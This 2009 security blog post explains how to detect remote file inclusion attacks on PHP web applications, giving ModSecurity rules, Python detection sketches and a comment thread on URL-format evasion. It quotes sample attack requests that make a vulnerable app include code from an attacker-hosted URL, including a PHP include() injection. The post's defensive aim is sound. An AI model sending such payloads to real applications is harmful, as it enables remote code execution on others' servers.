Wednesday, June 10, 2009

Generic Remote File Inclusion Attack Detection

Submitted by Ryan Barnett 6/10/2009

A big challenge in identifying web application attacks is detecting malicious activity that cannot easily be spotted using signatures. Remote file inclusion (RFI) is a popular technique used to attack web applications (especially PHP applications) from a remote server. RFI attacks are extremely dangerous because they allow a client to force a vulnerable application to run the client's own malicious code by including a reference to code hosted at a URL on a remote server. When an application executes the malicious code, it may lead to a backdoor exploit or technical information retrieval.

The application vulnerability leading to RFI is the result of insufficient validation of user input. To validate input properly and avoid RFI attacks, an application should check that user input doesn’t contain invalid characters or a reference to an unauthorized external location. Or Katz, who is the WebDefend signature team lead at Breach Security, recently gave a presentation at the OWASP Local Chapter meeting in Israel, and Breach Security Labs has since released a whitepaper based on his research. I would like to highlight a few of the detection items that were presented.

Challenges to Generic Detection
When taking a negative security approach to build a generic solution for RFI attacks, a natural first step is to use a regular expression such as “(ht|f)tps?://” to search for a signature within parameter payloads. This initially seems like a good approach, as it identifies the beginning of a fully qualified URI. Unfortunately, it also results in many false positives due to the following:
  • Some request parameters are used as external links (i.e., they accept http:// as valid input) and either point back to the local host (WordPress and other apps do this) or legitimately point to a resource on a remote site.
  • Some "free text" request parameters are prone to false positives. In many cases these parameters contain user input (free text submitted by the user to the application); in other cases they contain large amounts of data, which may include URL links that are falsely detected as RFI attacks.
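The false-positive problem can be illustrated with a minimal Python sketch. It is not part of the original research; the parameter names and values are invented for illustration, and Python's `re` module stands in for the regular expression engine a WAF would use.

```python
import re

# Naive signature from the text: the start of a fully qualified http(s)/ftp(s) URL.
NAIVE_RFI = re.compile(r"(ht|f)tps?://")

# Hypothetical parameter values, invented for illustration only.
samples = {
    "include": "http://192.0.55.2/hacker.txt?",        # actual RFI attempt
    "redirect_to": "http://www.example.com/wp-admin/",  # legitimate link back to the site
    "comment": "Nice post, see also https://www.example.org/article",  # free text
    "page": "about.php",                                # no URL at all
}

# Map each parameter name to whether the naive signature fires on its value.
flagged = {name: bool(NAIVE_RFI.search(value)) for name, value in samples.items()}

for name, hit in flagged.items():
    print(f"{name}: {'flagged' if hit else 'clean'}")
```

In this sketch the signature fires on the attack, but also on the legitimate link and the free-text comment, which is the weakness the two points above describe.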

URL Contains an IP Address
Most legitimate URL references specify an actual domain name or hostname, so the use of an IP address in an external link may indicate an attack. A typical attack using an IP address looks like:
GET /?include=http://192.0.55.2/hacker.txt HTTP/1.1
Host: www.test.com
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)
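As an aside, the hostname-versus-IP distinction in a request like the one above can be sketched in Python. This is an illustration only: it parses the URL with the standard library rather than matching a signature, and the function name `host_is_ip` is hypothetical.

```python
import ipaddress
from urllib.parse import urlsplit


def host_is_ip(value: str) -> bool:
    """Return True when the host part of a URL is an IP address literal."""
    host = urlsplit(value).hostname
    if host is None:
        # Not a fully qualified URL (for example a relative file name).
        return False
    try:
        ipaddress.ip_address(host)
    except ValueError:
        # The host is a name such as www.example.com, not an IP address.
        return False
    return True


print(host_is_ip("http://192.0.55.2/hacker.txt"))
print(host_is_ip("http://www.example.com/somefile.txt"))
```

Parsing the host is stricter than a pattern match, but it assumes the value has already been decoded and is a well-formed URL.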
Therefore, a rule for detecting such a condition should search for the pattern “(ht|f)tps?:\/\/” followed by an IP address. An example ModSecurity rule to detect it is:
SecRule ARGS "@rx (ht|f)tps?:\/\/([\d\.]+)" \
"t:none,t:urlDecodeUni,t:htmlEntityDecode,t:lowercase,deny,phase:2,msg:'Remote File Inclusion'"
The PHP "include()" Function
Breach Security Labs has seen many attack vectors (from customer logs and honeypot data samples) that try to include a remote file by using the PHP "include" keyword. A typical attack using the PHP include keyword looks like:
GET /?id={${include("http://www.malicuos_site.com/hacker.txt")}}{${exit()}} HTTP/1.1
Host: www.test.com
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)
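A payload like the one above may arrive URL-encoded or HTML-entity-encoded, so a detector generally has to decode the value before looking for an include call that wraps a URL. The following Python sketch illustrates the idea under that assumption. The helper names are hypothetical, and `urllib.parse.unquote` is only an approximation of a WAF's URL decoding (it does not handle %uXXXX encoding, for example).

```python
import html
import re
from urllib.parse import unquote

# An include( call whose argument contains an http(s)/ftp(s) URL.
INCLUDE_WITH_URL = re.compile(r"\binclude\s*\([^)]*(ht|f)tps?://")


def normalize(value: str) -> str:
    """URL-decode, HTML-entity-decode, and lowercase a parameter value."""
    return html.unescape(unquote(value)).lower()


def has_remote_include(value: str) -> bool:
    """Return True when the decoded value contains include(...) wrapping a URL."""
    return INCLUDE_WITH_URL.search(normalize(value)) is not None


# URL-encoded, mixed-case variant of the payload shown above.
encoded = "%7B%24%7BINCLUDE%28%22http%3A%2F%2Fwww.malicuos_site.com%2Fhacker.txt%22%29%7D%7D"

print(normalize(encoded))
print(has_remote_include(encoded))
print(has_remote_include("include(header.php)"))
```

Without the decoding step, the encoded variant would not contain the literal text the pattern looks for.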
A rule for detecting such a condition should search for “include(” followed by “(ht|f)tps?:\/\/”. An example ModSecurity rule to detect this is:
SecRule ARGS "@rx \binclude\s*\([^)]*(ht|f)tps?:\/\/" \
"t:none,t:urlDecodeUni,t:htmlEntityDecode,t:lowercase,deny,phase:2,msg:'Remote File Inclusion'"
RFI Data Ends with a Question Mark (?)
Appending a question mark to the end of the injected RFI payload is a common technique, somewhat similar to SQL injection payloads that end with comment specifiers (--, ;-- or #). RFI attackers don't know what the rest of the PHP code surrounding the inclusion point is supposed to do. By adding the "?" character, whatever the local PHP code appends to the supplied value is treated as a query-string parameter of the RFI included code. The RFI code then simply ignores that leftover legitimate data and executes only its own code. A typical attack using a question mark at the end looks like:
GET /?include=http://www.malicuos_site.com/hacker.txt? HTTP/1.1
Host: www.test.com
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)
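The effect of the trailing question mark can be sketched in Python. The example assumes a vulnerable application that appends a fixed suffix to the parameter value before including it. The `.php` suffix and the function name are hypothetical, chosen only to illustrate the mechanism.

```python
from urllib.parse import urlsplit

# Hypothetical: text the vulnerable application appends to the parameter value.
SUFFIX = ".php"


def remote_request(param_value: str):
    """Return (path, query) of the URL the server would end up fetching."""
    parts = urlsplit(param_value + SUFFIX)
    return parts.path, parts.query


# Without the question mark, the suffix changes the requested file name.
print(remote_request("http://www.malicuos_site.com/hacker.txt"))

# With the question mark, the suffix becomes a harmless query string.
print(remote_request("http://www.malicuos_site.com/hacker.txt?"))
```

In the second call the attacker's file name is left untouched, because the appended suffix now falls in the query string rather than the path.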
A rule for detecting such an attack should search for “(ft|htt)ps?.*\?+$”. An example ModSecurity rule to detect it is:
SecRule ARGS "@rx (ft|htt)ps?.*\?+$" \
"t:none,t:urlDecodeUni,t:htmlEntityDecode,t:lowercase,deny,phase:2,msg:'Remote File Inclusion'"
RFI Host Doesn't Match Local Host
One other technique for detecting RFI attacks (when the application never legitimately references files offsite) is to inspect the domain name/hostname specified within the parameter payload and compare it to the Host header submitted in the request. If the two match, the request is allowed, which permits normal fully qualified references back to the local site while simultaneously denying offsite references. For example, the following legitimate request would be allowed because the hostnames match:
GET /path/to/app?foo=bar&filename=http://www.example.com/somefile.txt HTTP/1.1
Host: www.example.com
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)
A rule for detecting such an attack should first search for “^(?:ht|f)tps?:\/\/(.*)\?$”, which also captures the hostname data within the second set of parentheses. The second part of the rule then compares the captured data with the macro-expanded Host header from the request. An example ModSecurity rule to detect it is:
SecRule ARGS "^(?:ht|f)tps?://(.*)\?$" \
"chain,phase:2,t:none,t:htmlEntityDecode,t:lowercase,capture,ctl:auditLogParts=+E,block,log,auditlog,status:501,msg:'Remote File Inclusion Attack'"
SecRule TX:1 "!@beginsWith %{request_headers.host}"
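The logic of this chained rule can be approximated in Python as a rough sketch. The function name is hypothetical, `html.unescape` stands in for the htmlEntityDecode transformation, and lowercasing the Host header before the comparison is an assumption added here rather than something the rule itself does.

```python
import html
import re

# First rule in the chain: a URL that ends with "?", capturing everything after "://".
OFFSITE = re.compile(r"^(?:ht|f)tps?://(.*)\?$")


def is_offsite_rfi(value: str, host_header: str) -> bool:
    """Return True when the value looks like an RFI URL pointing off the local host."""
    match = OFFSITE.search(html.unescape(value).lower())
    if match is None:
        # The first rule did not match, so the chained comparison never runs.
        return False
    # Second rule: flag the request unless the captured text begins with the Host header.
    return not match.group(1).startswith(host_header.lower())


print(is_offsite_rfi("http://www.malicuos_site.com/hacker.txt?", "www.test.com"))
print(is_offsite_rfi("http://www.example.com/somefile.txt?", "www.example.com"))
```

Because the comparison is a prefix match, a remote name that merely begins with the local hostname (for example www.example.com.evil.test when the Host header is www.example.com) would pass this check, so it is probably best treated as one signal among several.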
These generic RFI rules could be used individually or collaboratively in an anomaly scoring scenario to help identify these types of attacks. Keep an eye out for a major public release of the new ModSecurity Core Rule Set (CRS) as it will include these new rules and many others.
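To give a feel for how such rules might be combined in an anomaly scoring scenario, here is a small Python sketch. The weights, the threshold, and the check names are hypothetical values chosen for illustration; they are not taken from the Core Rule Set.

```python
import re

# (name, pattern, weight): the patterns come from the rules above, the weights are made up.
CHECKS = [
    ("url_with_ip", re.compile(r"(ht|f)tps?://[\d.]+"), 2),
    ("php_include", re.compile(r"\binclude\s*\([^)]*(ht|f)tps?://"), 3),
    ("trailing_question_mark", re.compile(r"(ft|htt)ps?.*\?+$"), 2),
]

# Hypothetical score at or above which a request would be blocked.
BLOCK_THRESHOLD = 4


def anomaly_score(value: str):
    """Return (total score, names of the checks that matched) for a parameter value."""
    lowered = value.lower()
    hits = [(name, weight) for name, pattern, weight in CHECKS if pattern.search(lowered)]
    return sum(weight for _, weight in hits), [name for name, _ in hits]


for sample in ("http://192.0.55.2/hacker.txt?", "is https safe?", "about.php"):
    score, names = anomaly_score(sample)
    verdict = "block" if score >= BLOCK_THRESHOLD else "allow"
    print(f"{sample!r}: score={score} {names} -> {verdict}")
```

With these example weights, a single weak match such as free text ending in a question mark stays below the threshold, while a payload that trips two checks is blocked.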

3 comments:

Arshan Dabirsiaghi said...

i think this rule is fail because most browsers tolerate unusual-if-not-strictly-illegal URL slash formats:

SecRule ARGS "^(?:ht|f)tps?://(.*)\?$" \

see my post at: http://i8jesus.com/?p=37 and the browser security handbook:

http://code.google.com/p/browsersec/wiki/Part1#Uniform_Resource_Locators

Ryan Barnett said...

Hey Arshan :) You bring up some good points however the RFI payloads aren't normally aimed at end users like in an XSS attack so this isn't really an issue with browser interpretation. The issue is how is the PHP include() or allow_url_fopen functions going to interpret it? http://en.wikipedia.org/wiki/Remote_File_Inclusione#Why_the_attack_works

I haven't tested it yet, but my hunch is that if a client supplied RFI code with abnormal slashes (as you referenced) then the included PHP code wouldn't properly trigger. This is a case that I often run into with XSS evasion payloads. Attackers may figure out a way to circumvent a signature/filter however by doing so they have munged up the JS payload so much that it won't actually execute in the browser.

Arshan Dabirsiaghi said...

I'm a retard. You're absolutely right. I was pointed to this post to look for that problem and I didn't really read the rest of it carefully.

On the other hand, my temporary loss of 120 IQ may have landed on the good idea you mentioned - fuzzing the dangerous PHP functions for bizarro URL features.